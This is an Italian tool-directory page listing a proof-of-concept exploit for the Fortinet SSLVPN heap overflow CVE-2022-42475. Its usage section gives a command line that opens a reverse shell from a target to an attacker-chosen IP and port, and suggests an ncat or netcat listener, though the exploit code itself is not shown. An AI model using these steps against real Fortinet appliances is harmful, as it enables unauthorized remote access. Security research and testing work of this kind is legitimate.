Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-42475-Fortinet — Exploit Python per l'heap overflow CVE-2022-42475 nel demone SSLVPN di Fortinet. Consegna una reverse shell tramite pwntools con target, porta e comandi personalizzabili. | Kitploit
Strumenti/GitHubGitHub/mustafa1986/cve-2022-42475-fortinet
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingStrumento di Accesso RemotoBinary Exploitation
GitHubmustafa1986/cve-2022-42475-fortinet

cve-2022-42475-Fortinet

Exploit Python per l'heap overflow CVE-2022-42475 nel demone SSLVPN di Fortinet. Consegna una reverse shell tramite pwntools con target, porta e comandi personalizzabili.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1333 anni faNon ancora revisionato
Condividi

cve-2022-42475

Codice POC per sfruttare l'overflow dell'heap nel demone SSLVPN di Fortinet

Utilizzo

pip install pwntools Per usare questo codice, puoi salvarlo in un file, ad esempio exploit.py, e poi eseguirlo con Python dalla riga di comando, passando gli argomenti richiesti. Ecco un comando di esempio per eseguire l'exploit:

python exploit.py <target_host> <target_port> <reverse_ip>

Sostituisci <target_host> con il nome host o l'indirizzo IP del sistema target, <target_port> con il numero di porta del servizio vulnerabile e <reverse_ip> con l'indirizzo IP della macchina su cui vuoi ricevere una shell. Gli argomenti rimanenti sono i comandi che vuoi eseguire, separati da spazi.

Ad esempio, se il sistema target ha l'indirizzo IP 192.168.0.100, il servizio vulnerabile è in ascolto sulla porta 8080 e vuoi eseguire i comandi ls e id, dovresti eseguire il seguente comando:

python exploit.py 192.168.0.100 8080 192.168.0.101 id

Questo creerà una connessione di shell inversa verso 192.168.0.101:31337 ed eseguirà i comandi ls e id sul sistema target. Nota che dovrai avere un listener in ascolto sull'indirizzo IP e sulla porta specificati per ricevere la shell inversa. Puoi usare strumenti come ncat o netcat per creare un listener.

Scarica lo strumento